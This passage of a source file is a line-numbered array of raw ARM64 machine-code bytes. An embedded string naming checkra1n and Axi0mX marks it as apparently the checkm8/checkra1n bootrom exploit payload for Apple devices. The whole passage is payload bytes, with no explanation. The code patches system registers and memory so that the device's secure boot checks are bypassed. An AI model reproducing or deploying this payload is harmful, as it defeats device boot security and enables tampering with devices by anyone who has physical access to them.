0x00, 9 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 10 | 0xf4, 0xdd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 11 | 0x00, 0x00, 0x00, 0x00, 0x64, 0x2f, 0x0c, 0x80, 0x01, 0x00, 0x00, 0x00, 12 | 0x2c, 0xbc, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 13 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 14 | 0xc0, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 0x48, 0x04, 0x00, 0x00, 15 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 16 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 17 | 0x00, 0x00, 0x00, 0x00, 0x24, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 18 | 0x00, 0x00, 0x00, 0x10, 0x21, 0x54, 0x00, 0x10, 0x7e, 0x01, 0x00, 0x10, 19 | 0x9f, 0x3f, 0x03, 0xd5, 0x20, 0x7b, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 20 | 0x1f, 0x00, 0x01, 0xeb, 0xa3, 0xff, 0xff, 0x54, 0x9f, 0x3f, 0x03, 0xd5, 21 | 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 22 | 0xc0, 0x03, 0x5f, 0xd6, 0xe0, 0x07, 0x61, 0xb2, 0x21, 0x00, 0xc0, 0xd2, 23 | 0x42, 0x00, 0xa0, 0x52, 0x04, 0x01, 0x00, 0x94, 0xe0, 0x07, 0x61, 0xb2, 24 | 0x00, 0x23, 0x94, 0xf2, 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x78, 0x80, 0x72, 25 | 0x01, 0x00, 0x00, 0xb9, 0xe0, 0x07, 0x61, 0xb2, 0x07, 0x24, 0x40, 0x91, 26 | 0x01, 0x80, 0xb2, 0x52, 0x01, 0x20, 0x80, 0x72, 0xe1, 0x00, 0x00, 0xb9, 27 | 0xe1, 0x03, 0x84, 0x52, 0x61, 0xa0, 0xba, 0x72, 0xe1, 0x38, 0x00, 0xb9, 28 | 0xe1, 0x48, 0x00, 0xb9, 0x01, 0x80, 0x40, 0x91, 0xe3, 0xff, 0xff, 0x97, 29 | 0x00, 0x20, 0x3e, 0xd5, 0x41, 0x20, 0x3e, 0xd5, 0x21, 0x14, 0x00, 0x12, 30 | 0x3f, 0x64, 0x00, 0x71, 0x62, 0x00, 0x00, 0x54, 0x00, 0x00, 0x40, 0xf9, 31 | 0x00, 0x8c, 0x74, 0x92, 0x00, 0x10, 0x40, 0xf9, 0x00, 0x8c, 0x74, 0x92, 32 | 0xa1, 0xd0, 0x80, 0xd2, 0x21, 0x04, 0x61, 0xb2, 0x01, 0x00, 0x00, 0xf9, 33 | 0x9f, 0x3f, 0x03, 0xd5, 0x1f, 0x87, 0x0e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 34 | 0xe7, 0x07, 0x61, 0xb2, 0xe7, 0x80, 0x43, 0x91, 0xe0, 0x00, 0x10, 0x91, 35 | 0x61, 0x01, 0x00, 0x10, 0x02, 0x32, 0x81, 0xd2, 0xdf, 0x00, 0x00, 0x94, 36 | 0xe0, 0x00, 0x10, 0x91, 0x01, 0x40, 0x26, 0x91, 0xcb, 0xff, 0xff, 0x97, 37 | 0x28, 0x00, 0xc0, 0xd2, 0x08, 0xc5, 0x80, 0xf2, 0x00, 0x00, 0x80, 0x52, 38 | 0x13, 0x00, 0x80, 0x52, 0x00, 0x01, 0x1f, 0xd6, 0xf9, 0x03, 0x00, 0xaa, 39 | 0xf8, 0x03, 0x01, 0xaa, 0xf7, 0x03, 0x1e, 0xaa, 0xf6, 0x03, 0x1d, 0xaa, 40 | 0xac, 0x01, 0x00, 0x94, 0x20, 0x03, 0x42, 0xb9, 0x81, 0x89, 0x89, 0x52, 41 | 0x41, 0x08, 0xa4, 0x72, 0x1f, 0x00, 0x01, 0x6b, 0x80, 0x01, 0x00, 0x54, 42 | 0x21, 0xcd, 0x89, 0x52, 0xe1, 0xed, 0xad, 0x72, 0x21, 0x03, 0x02, 0xb9, 43 | 0x20, 0x0b, 0x42, 0xb9, 0xe1, 0xac, 0x8c, 0x52, 0x21, 0x06, 0xa4, 0x72, 44 | 0x1f, 0x00, 0x01, 0x6b, 0x80, 0x00, 0x00, 0x54, 0xe0, 0x03, 0x19, 0xaa, 45 | 0xe8, 0x01, 0x00, 0x94, 0x04, 0x02, 0x00, 0x94, 0x20, 0x13, 0x00, 0x91, 46 | 0x01, 0xc0, 0xa6, 0x52, 0x01, 0x01, 0x80, 0x72, 0xe2, 0x4b, 0x0e, 0x32, 47 | 0xe3, 0x2b, 0x18, 0x32, 0x05, 0x3c, 0xc0, 0x92, 0x05, 0xf0, 0xbf, 0xf2, 48 | 0x05, 0x02, 0x80, 0xf2, 0x06, 0x50, 0xbe, 0xd2, 0xc7, 0x40, 0x00, 0x91, 49 | 0x06, 0x28, 0xf7, 0xf2, 0x06, 0x01, 0xc0, 0xf2, 0xe7, 0x0b, 0xf7, 0xf2, 50 | 0x07, 0x41, 0xd8, 0xf2, 0x00, 0x10, 0x00, 0x91, 0xc5, 0x01, 0x00, 0x94, 51 | 0xa0, 0x12, 0x00, 0xb4, 0x04, 0x80, 0x5f, 0xf8, 0x84, 0x00, 0x05, 0x8a, 52 | 0x9f, 0x00, 0x06, 0xeb, 0x84, 0x10, 0x47, 0xfa, 0x21, 0xff, 0xff, 0x54, 53 | 0x04, 0x21, 0x80, 0x52, 0x04, 0x40, 0xa6, 0x72, 0x04, 0x00, 0x00, 0xb9, 54 | 0x00, 0x10, 0x00, 0xd1, 0x01, 0x00, 0x80, 0x52, 0x01, 0x80, 0xb2, 0x72, 55 | 0x02, 0x00, 0x80, 0x52, 0x02, 0x80, 0xbf, 0x72, 0x03, 0x80, 0x00, 0xd1, 56 | 0x04, 0xcc, 0x5f, 0xf8, 0x84, 0x00, 0x02, 0x8a, 0x9f, 0x00, 0x01, 0xeb, 57 | 0x80, 0x00, 0x00, 0x54, 0x1f, 0x00, 0x03, 0xeb, 0x68, 0xff, 0xff, 0x54, 58 | 0x80, 0x00, 0x00, 0x14, 0x62, 0xa0, 0xba, 0x52, 0xe2, 0x03, 0x84, 0x72, 59 | 0x02, 0x08, 0x00, 0x29, 0xe0, 0x03, 0x19, 0xaa, 0xfc, 0x01, 0x00, 0x94, 60 | 0xe1, 0x2b, 0x18, 0x32, 0x01, 0x00, 0x01, 0x8b, 0x62, 0xa0, 0xba, 0x52, 61 | 0xe2, 0x03, 0x84, 0x72, 0x43, 0x80, 0x22, 0x11, 0x04, 0x80, 0xa2, 0x52, 62 | 0x07, 0x44, 0x80, 0xd2, 0x08, 0x00, 0x80, 0xd2, 0x1f, 0x00, 0x01, 0xeb, 63 | 0x22, 0x0e, 0x00, 0x54, 0x05, 0x00, 0x40, 0xb9, 0xbf, 0x00, 0x00, 0x71, 64 | 0xa4, 0x10, 0x42, 0x7a, 0xa4, 0x10, 0x43, 0x7a, 0xa4, 0x10, 0x44, 0x7a, 65 | 0x60, 0x00, 0x00, 0x54, 0x00, 0x10, 0x00, 0x91, 0xf7, 0xff, 0xff, 0x17, 66 | 0xe5, 0x03, 0x00, 0xaa, 0xa6, 0x4c, 0x40, 0xb8, 0xdf, 0x00, 0x00, 0x71, 67 | 0xc4, 0x10, 0x42, 0x7a, 0xc4, 0x10, 0x43, 0x7a, 0xc4, 0x10, 0x44, 0x7a, 68 | 0x60, 0x00, 0x00, 0x54, 0xe0, 0x03, 0x05, 0xaa, 0xee, 0xff, 0xff, 0x17, 69 | 0xa6, 0x00, 0x00, 0xcb, 0xdf, 0x00, 0x07, 0x6b, 0x42, 0x00, 0x00, 0x54, 70 | 0xf5, 0xff, 0xff, 0x17, 0xe9, 0x03, 0x00, 0xaa, 0xa8, 0x00, 0x00, 0xb5, 71 | 0xe8, 0x03, 0x09, 0xaa, 0xe0, 0x03, 0x05, 0xaa, 0x07, 0x44, 0x80, 0xd2, 72 | 0xe4, 0xff, 0xff, 0x17, 0xe0, 0x03, 0x08, 0xaa, 0x61, 0x0e, 0x00, 0x10, 73 | 0x02, 0x44, 0x80, 0xd2, 0x6e, 0x00, 0x00, 0x94, 0xe0, 0x03, 0x09, 0xaa, 74 | 0xe1, 0x1e, 0x00, 0x10, 0x02, 0x44, 0x80, 0xd2, 0x6a, 0x00, 0x00, 0x94, 75 | 0x27, 0xc3, 0x09, 0x91, 0xe8, 0x24, 0x00, 0xa9, 0x20, 0x83, 0x0a, 0x91, 76 | 0xe8, 0x03, 0x00, 0xaa, 0x01, 0x0a, 0x00, 0x10, 0x02, 0x0c, 0x80, 0xd2, 77 | 0x63, 0x00, 0x00, 0x94, 0xe0, 0x03, 0x19, 0xaa, 0x01, 0x50, 0xba, 0x52, 78 | 0x41, 0x02, 0x80, 0x72, 0x02, 0x00, 0x80, 0x12, 0xe3, 0x2b, 0x18, 0x32, 79 | 0x70, 0x01, 0x00, 0x94, 0x00, 0x08, 0x00, 0xb4, 0xc1, 0xa3, 0xba, 0x52, 80 | 0x01, 0x00, 0x82, 0x72, 0xe2, 0x03, 0x80, 0x12, 0x03, 0x40, 0x80, 0x52, 81 | 0x73, 0x01, 0x00, 0x94, 0x40, 0x07, 0x00, 0xb4, 0xe1, 0x18, 0x00, 0x18, 82 | 0x02, 0x00, 0x80, 0x12, 0x03, 0x04, 0x80, 0x52, 0x65, 0x01, 0x00, 0x94, 83 | 0xa0, 0x06, 0x00, 0xb4, 0x24, 0x53, 0x09, 0x91, 0x05, 0x98, 0xc0, 0x29, 84 | 0x85, 0x18, 0x81, 0x28, 0x05, 0x18, 0x41, 0x29, 0xc7, 0x7c, 0x18, 0x53, 85 | 0xff, 0x60, 0x01, 0x71, 0x60, 0x00, 0x00, 0x54, 0x85, 0x18, 0x81, 0x28, 86 | 0x13, 0x00, 0x00, 0x14, 0x85, 0x44, 0x00, 0xb8, 0xc7, 0x5c, 0x05, 0x13, 87 | 0x07, 0xc8, 0x27, 0x8b, 0xe7, 0xc0, 0x40, 0xf8, 0xff, 0x3c, 0x50, 0xf2, 88 | 0xc1, 0x04, 0x00, 0x54, 0xc6, 0x10, 0x00, 0x12, 0x06, 0x58, 0xba, 0x72, 89 | 0xe5, 0xbc, 0x60, 0xd3, 0xa6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 90 | 0x06, 0x54, 0xbe, 0x72, 0xe5, 0x7c, 0x50, 0xd3, 0xa6, 0x3c, 0x1b, 0x33, 91 | 0x86, 0x44, 0x00, 0xb8, 0x06, 0x50, 0xbe, 0x72, 0xe6, 0x3c, 0x1b, 0x33, 92 | 0x86, 0x44, 0x00, 0xb8, 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 93 | 0x81, 0x00, 0x00, 0xb9, 0x01, 0x58, 0xba, 0x52, 0x41, 0x02, 0x80, 0x72, 94 | 0x05, 0xbd, 0x60, 0xd3, 0xa1, 0x3c, 0x1b, 0x33, 0x01, 0x00, 0x00, 0xb9, 95 | 0x01, 0x54, 0xbe, 0x72, 0x05, 0x7d, 0x50, 0xd3, 0xa1, 0x3c, 0x1b, 0x33, 96 | 0x01, 0x04, 0x00, 0xb9, 0x01, 0x50, 0xbe, 0x72, 0x01, 0x3d, 0x1b, 0x33, 97 | 0x01, 0x08, 0x00, 0xb9, 0xe1, 0xc7, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 98 | 0x01, 0x0c, 0x00, 0xb9, 0xe0, 0x03, 0x19, 0xaa, 0xe1, 0x03, 0x18, 0xaa, 99 | 0xfe, 0x03, 0x17, 0xaa, 0xfd, 0x03, 0x16, 0xaa, 0x9f, 0x3f, 0x03, 0xd5, 100 | 0xdf, 0x4f, 0x03, 0xd5, 0xc0, 0x03, 0x5f, 0xd6, 0x48, 0x00, 0xc0, 0xd2, 101 | 0x48, 0xc0, 0xa1, 0xf2, 0x08, 0x00, 0x94, 0xf2, 0x00, 0x01, 0x40, 0xb9, 102 | 0x00, 0x78, 0x1f, 0x12, 0x00, 0x01, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x14, 103 | 0xf2, 0x03, 0x1e, 0xaa, 0xc0, 0xcf, 0x74, 0x92, 0x00, 0x00, 0x2f, 0x91, 104 | 0x81, 0x02, 0x00, 0x18, 0xc2, 0x4f, 0x40, 0xb8, 0x5f, 0x00, 0x01, 0x6b, 105 | 0xc1, 0xff, 0xff, 0x54, 0x04, 0x00, 0x1e, 0xcb, 0x02, 0x80, 0xa2, 0x52, 106 | 0x82, 0x6c, 0x02, 0x33, 0xc2, 0x03, 0x00, 0xb9, 0x21, 0xfd, 0xff, 0x58, 107 | 0x02, 0x44, 0x80, 0xd2, 0x08, 0x00, 0x00, 0x94, 0x01, 0xfd, 0xff, 0x58, 108 | 0x02, 0x44, 0x80, 0xd2, 0x05, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 109 | 0xdb, 0xff, 0xff, 0x17, 0x24, 0x44, 0x40, 0xb8, 0x04, 0x44, 0x00, 0xb8, 110 | 0x42, 0x10, 0x00, 0x71, 0xa2, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 111 | 0xdf, 0x4f, 0x03, 0xd5, 0xfc, 0x03, 0x1e, 0xaa, 0xfb, 0x03, 0x00, 0xaa, 112 | 0x48, 0x00, 0xc0, 0xd2, 0x48, 0xc0, 0xa1, 0xf2, 0x08, 0x00, 0x8e, 0xf2, 113 | 0x1f, 0x0d, 0x00, 0xb9, 0x1f, 0x1d, 0x00, 0xb9, 0xc8, 0x1d, 0x00, 0x58, 114 | 0x08, 0xc0, 0x1e, 0xd5, 0x40, 0x02, 0x00, 0x10, 0x21, 0x00, 0xc0, 0xd2, 115 | 0xe1, 0x01, 0xb0, 0xf2, 0x01, 0x00, 0x98, 0xf2, 0x22, 0x10, 0x40, 0x91, 116 | 0x2a, 0x04, 0x40, 0xd1, 0x1f, 0x00, 0x01, 0xeb, 0x02, 0x20, 0x42, 0xfa, 117 | 0x43, 0x01, 0x00, 0x54, 0x21, 0xc0, 0x01, 0x91, 0x22, 0x40, 0x0f, 0x91, 118 | 0xe3, 0x03, 0x01, 0xaa, 0x04, 0x44, 0x40, 0xb8, 0x24, 0x44, 0x00, 0xb8, 119 | 0x3f, 0x00, 0x02, 0xeb, 0xa3, 0xff, 0xff, 0x54, 0x9b, 0x00, 0x00, 0x94, 120 | 0x60, 0x00, 0x1f, 0xd6, 0xc0, 0x19, 0x00, 0x58, 0xe1, 0x19, 0x00, 0x58, 121 | 0x02, 0x00, 0x81, 0x52, 0x9b, 0x00, 0x00, 0x94, 0x02, 0x5a, 0x90, 0x52, 122 | 0x9e, 0x00, 0x00, 0x94, 0x80, 0x19, 0x00, 0x58, 0xbf, 0x41, 0x00, 0xd5, 123 | 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 0xbf, 0x40, 0x00, 0xd5, 124 | 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 0xe8, 0x18, 0x00, 0x58, 125 | 0x00, 0x01, 0x00, 0xf9, 0x20, 0x00, 0xc0, 0xd2, 0x00, 0x18, 0x40, 0x91, 126 | 0xe1, 0x03, 0x0a, 0xaa, 0x02, 0x00, 0x82, 0x52, 0x8b, 0x00, 0x00, 0x94, 127 | 0x00, 0x80, 0xb2, 0x52, 0x00, 0xc2, 0x8c, 0x72, 0x40, 0x61, 0x0a, 0xb9, 128 | 0x40, 0xfe, 0x8c, 0x72, 0x40, 0xed, 0x02, 0xb9, 0xa0, 0x06, 0x8d, 0x72, 129 | 0x40, 0xe1, 0x01, 0xb9, 0xff, 0x44, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 130 | 0x29, 0x17, 0x00, 0x58, 0x07, 0x0c, 0xe0, 0xd2, 0x27, 0x84, 0x80, 0xf2, 131 | 0xe1, 0x03, 0x09, 0xaa, 0x02, 0x00, 0x90, 0x52, 0x81, 0x00, 0x00, 0x94, 132 | 0x28, 0x05, 0x40, 0x91, 0x00, 0x05, 0x40, 0xb2, 0x20, 0x11, 0x00, 0xf9, 133 | 0x00, 0x04, 0x40, 0x91, 0x00, 0x01, 0x00, 0xf9, 0x28, 0x09, 0x40, 0x91, 134 | 0x20, 0x00, 0xc0, 0xd2, 0x41, 0x00, 0xa0, 0x52, 0xe0, 0xd0, 0x80, 0xf2, 135 | 0x7f, 0x00, 0x00, 0x94, 0x40, 0x1d, 0x1a, 0x91, 0x00, 0x19, 0x00, 0xf9, 136 | 0x00, 0x04, 0x40, 0x91, 0x00, 0x81, 0x00, 0xf9, 0x28, 0x0d, 0x40, 0x91, 137 | 0x00, 0x05, 0x40, 0xb2, 0x20, 0x19, 0x00, 0xf9, 0xe0, 0x07, 0x61, 0xb2, 138 | 0x01, 0x08, 0xa0, 0x52, 0xa0, 0xc0, 0x80, 0xf2, 0x78, 0x00, 0x00, 0x94, 139 | 0x28, 0x11, 0x40, 0x91, 0x00, 0x05, 0x40, 0xb2, 0x20, 0x21, 0x00, 0xf9, 140 | 0x40, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0xa2, 0x52, 0x00, 0x00, 0x07, 0xaa, 141 | 0x71, 0x00, 0x00, 0x94, 0xc0, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0x80, 0x52, 142 | 0x00, 0x00, 0x07, 0xaa, 0xe8, 0x03, 0x09, 0xaa, 0x64, 0x00, 0x00, 0x94, 143 | 0x9f, 0x3f, 0x03, 0xd5, 0x80, 0xe0, 0x9f, 0x52, 0x00, 0xa2, 0x1e, 0xd5, 144 | 0x09, 0x20, 0x1e, 0xd5, 0x20, 0x00, 0xa0, 0x52, 0x80, 0xa3, 0x84, 0x72, 145 | 0x40, 0x20, 0x1e, 0xd5, 0x1f, 0x87, 0x0e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 146 | 0xc0, 0x01, 0x80, 0x52, 0x00, 0x11, 0x1e, 0xd5, 0xa8, 0x01, 0x82, 0x52, 147 | 0x00, 0x10, 0x3e, 0xd5, 0x00, 0x00, 0x08, 0xaa, 0x00, 0x10, 0x1e, 0xd5, 148 | 0xdf, 0x3f, 0x03, 0xd5, 0x48, 0x11, 0x00, 0x58, 0xe0, 0x10, 0x00, 0x58, 149 | 0x01, 0x02, 0xa0, 0x52, 0x01, 0x00, 0x80, 0x72, 0x22, 0x00, 0x80, 0x52, 150 | 0x00, 0x01, 0x3f, 0xd6, 0xd3, 0x10, 0x00, 0x10, 0xf4, 0x11, 0x00, 0x10, 151 | 0x68, 0x86, 0x40, 0xf8, 0x00, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 152 | 0x7f, 0x02, 0x14, 0xeb, 0x83, 0xff, 0xff, 0x54, 0x68, 0x11, 0x00, 0x58, 153 | 0x20, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 0xe0, 0x0b, 0x00, 0x10, 154 | 0x21, 0x11, 0x00, 0x58, 0xe2, 0x01, 0x80, 0xd2, 0x03, 0x14, 0x40, 0x38, 155 | 0x23, 0x14, 0x00, 0x38, 0x42, 0x04, 0x00, 0x51, 0xa2, 0xff, 0xff, 0x35, 156 | 0x60, 0x0b, 0x00, 0x70, 0x81, 0x10, 0x00, 0x58, 0xa2, 0x03, 0x80, 0xd2, 157 | 0x03, 0x14, 0x40, 0x38, 0x23, 0x14, 0x00, 0x38, 0x42, 0x04, 0x00, 0x51, 158 | 0xa2, 0xff, 0xff, 0x35, 0x40, 0x00, 0x80, 0x52, 0xe1, 0x0f, 0x00, 0x58, 159 | 0x20, 0x00, 0x00, 0xb9, 0xa8, 0x0e, 0x00, 0x58, 0x40, 0x0c, 0x00, 0x58, 160 | 0x01, 0x01, 0xa0, 0xd2, 0x00, 0x01, 0x3f, 0xd6, 0x42, 0x00, 0x00, 0x94, 161 | 0x9f, 0x3f, 0x03, 0xd5, 0xa0, 0x0b, 0x00, 0x58, 0x01, 0x00, 0x42, 0x91, 162 | 0x20, 0x7b, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 0x1f, 0x00, 0x01, 0xeb, 163 | 0xa3, 0xff, 0xff, 0x54, 0x18, 0x00, 0x00, 0x94, 0xdf, 0x4f, 0x03, 0xd5, 164 | 0xbf, 0x41, 0x00, 0xd5, 0xff, 0x03, 0x40, 0x92, 0x1f, 0x41, 0x18, 0xd5, 165 | 0x1f, 0xc0, 0x1e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 0xfe, 0x03, 0x1c, 0xaa, 166 | 0xe0, 0x03, 0x1b, 0xaa, 0xc8, 0x09, 0x00, 0x58, 0x00, 0x01, 0x1f, 0xd6, 167 | 0x20, 0x00, 0xc0, 0xd2, 0x00, 0x01, 0xb0, 0xf2, 0x00, 0xc8, 0x86, 0xf2, 168 | 0x01, 0x08, 0x80, 0x52, 0x05, 0x00, 0x00, 0x14, 0x20, 0x07, 0x40, 0xf9, 169 | 0x21, 0x8b, 0x42, 0x29, 0x00, 0x40, 0x22, 0x8b, 0x21, 0x00, 0x02, 0x4b, 170 | 0x20, 0x7e, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 0x21, 0x00, 0x01, 0xf1, 171 | 0xa8, 0xff, 0xff, 0x54, 0x9f, 0x3f, 0x03, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 172 | 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 0xc0, 0x03, 0x5f, 0xd6, 173 | 0x03, 0x10, 0xc1, 0xa8, 0x23, 0x10, 0x81, 0xa8, 0x42, 0x40, 0x00, 0x71, 174 | 0xa8, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0x3f, 0x7c, 0x81, 0xa8, 175 | 0x42, 0x40, 0x00, 0x71, 0xc8, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 176 | 0x04, 0xfc, 0x5b, 0xd3, 0x21, 0xfc, 0x5e, 0xd3, 0x03, 0x00, 0xa8, 0x52, 177 | 0x08, 0x00, 0x00, 0x14, 0x04, 0xfc, 0x49, 0xd3, 0x21, 0xfc, 0x4c, 0xd3, 178 | 0x03, 0x00, 0x82, 0x52, 0x04, 0x00, 0x00, 0x14, 0x04, 0xfc, 0x52, 0xd3, 179 | 0x21, 0xfc, 0x55, 0xd3, 0x03, 0x04, 0xa0, 0x52, 0x84, 0x20, 0x7d, 0x92, 180 | 0x84, 0x00, 0x08, 0x8b, 0x02, 0x00, 0x80, 0x52, 0x80, 0x58, 0x22, 0xf8, 181 | 0x00, 0x00, 0x03, 0x8b, 0x42, 0x04, 0x00, 0x11, 0x5f, 0x00, 0x01, 0x6b, 182 | 0x83, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0x41, 0x00, 0xc0, 0xd2, 183 | 0x01, 0xc6, 0xa1, 0xf2, 0x81, 0x36, 0x80, 0xf2, 0x20, 0x00, 0x40, 0xb9, 184 | 0x00, 0x74, 0x1e, 0x12, 0x20, 0x00, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6, 185 | 0x1f, 0x20, 0x03, 0xd5, 0x59, 0x4f, 0x4c, 0x4f, 0x3a, 0x63, 0x68, 0x65, 186 | 0x63, 0x6b, 0x72, 0x61, 0x31, 0x6e, 0x00, 0x47, 0x41, 0x4e, 0x47, 0x3a, 187 | 0x4b, 0x4a, 0x43, 0x20, 0x48, 0x41, 0x58, 0x58, 0x3a, 0x41, 0x78, 0x69, 188 | 0x30, 0x6d, 0x58, 0x20, 0x45, 0x54, 0x41, 0x3a, 0x73, 0x6f, 0x6e, 0x00, 189 | 0x00, 0x90, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x80, 190 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x10, 0x0c, 0x80, 0x01, 0x00, 0x00, 0x00, 191 | 0x00, 0x00, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x50, 0x0c, 0x80, 192 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 193 | 0x00, 0xd0, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x80, 194 | 0x01, 0x00, 0x00, 0x00, 0x90, 0x6f, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 195 | 0x10, 0xbb, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb4, 0xb1, 0x00, 0x00, 196 | 0x01, 0x00, 0x00, 0x00, 0xc4, 0x26, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 197 | 0x9c, 0x11, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x24, 0xc1, 0x00, 0x00, 198 | 0x01, 0x00, 0x00, 0x00, 0xbc, 0xed, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 199 | 0xbc, 0xff, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x10, 0x89, 0x08, 0x80, 200 | 0x01, 0x00, 0x00, 0x00, 0x47, 0x89, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 201 | 0xc4, 0x88, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x40, 0xb9, 202 | 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 203 | 0x00, 0x10, 0x00, 0x91, 0x63, 0x10, 0x00, 0x51, 0x43, 0xff, 0xff, 0x35, 204 | 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 0x04, 0x00, 0x40, 0xb9, 205 | 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 206 | 0x00, 0x10, 0x00, 0xd1, 0x63, 0x10, 0x00, 0x51, 0x43, 0xff, 0xff, 0x35, 207 | 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 208 | 0xa5, 0x4e, 0xb2, 0x52, 0x05, 0x00, 0x9a, 0x72, 0x06, 0x48, 0xb6, 0x52, 209 | 0xe7, 0x43, 0xb5, 0x52, 0x28, 0x40, 0xa5, 0x52, 0x08, 0x7c, 0x80, 0x72, 210 | 0x43, 0x44, 0x40, 0xb8, 0x64, 0x68, 0x1b, 0x12, 0x9f, 0x00, 0x05, 0x6b, 211 | 0xa1, 0xff, 0xff, 0x54, 0x66, 0x10, 0x1b, 0x33, 0x44, 0x00, 0x40, 0xb9, 212 | 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x06, 0x6b, 0x60, 0x01, 0x00, 0x54, 213 | 0x7f, 0x00, 0x08, 0x6b, 0xc1, 0xfe, 0xff, 0x54, 0xc9, 0x10, 0x1b, 0x12, 214 | 0x09, 0x40, 0xb5, 0x72, 0x89, 0x10, 0x10, 0x33, 0x44, 0x04, 0x40, 0xb9, 215 | 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x09, 0x6b, 0xe1, 0xfd, 0xff, 0x54, 216 | 0x42, 0x10, 0x00, 0x91, 0x87, 0x24, 0x00, 0x33, 0x47, 0x00, 0x00, 0xb9, 217 | 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 0xc7, 0x41, 0xa6, 0x52, 218 | 0x07, 0x7c, 0x80, 0x72, 0x08, 0x54, 0xaa, 0x52, 0x08, 0x10, 0x80, 0x72, 219 | 0x09, 0x40, 0xb5, 0x52, 0x09, 0x7e, 0x80, 0x72, 0xea, 0x40, 0x40, 0x51, 220 | 0x0b, 0x01, 0x02, 0x11, 0x43, 0x44, 0x40, 0xb8, 0x7f, 0x00, 0x07, 0x6b, 221 | 0x64, 0x10, 0x48, 0x7a, 0xa1, 0xff, 0xff, 0x54, 0x43, 0x90, 0x40, 0x29, 222 | 0x63, 0x6c, 0x1c, 0x12, 0x9f, 0x00, 0x0a, 0x6b, 0x84, 0x10, 0x4b, 0x7a, 223 | 0x60, 0x00, 0x49, 0x7a, 0xe1, 0xfe, 0xff, 0x54, 0x43, 0x00, 0x40, 0xb9, 224 | 0x44, 0x0c, 0x40, 0xb9, 0x63, 0x00, 0x04, 0x4b, 0x84, 0x7c, 0x1a, 0x53, 225 | 0x9f, 0x94, 0x00, 0x71, 0x60, 0x08, 0x43, 0x7a, 0x01, 0xfe, 0xff, 0x54, 226 | 0x42, 0x30, 0x00, 0x91, 0x43, 0x4c, 0x40, 0xb8, 0x64, 0x7c, 0x1a, 0x53, 227 | 0x9f, 0x94, 0x00, 0x71, 0xa1, 0xff, 0xff, 0x54, 0x63, 0x64, 0x00, 0x13, 228 | 0x47, 0x00, 0x00, 0x18, 0x47, 0xd8, 0x23, 0xb8, 0xc0, 0x03, 0x5f, 0xd6, 229 | 0xe2, 0x03, 0x00, 0xaa, 0x03, 0x28, 0xb7, 0x52, 0x23, 0x21, 0x80, 0x72, 230 | 0x24, 0x40, 0xa6, 0x52, 0x24, 0x25, 0x80, 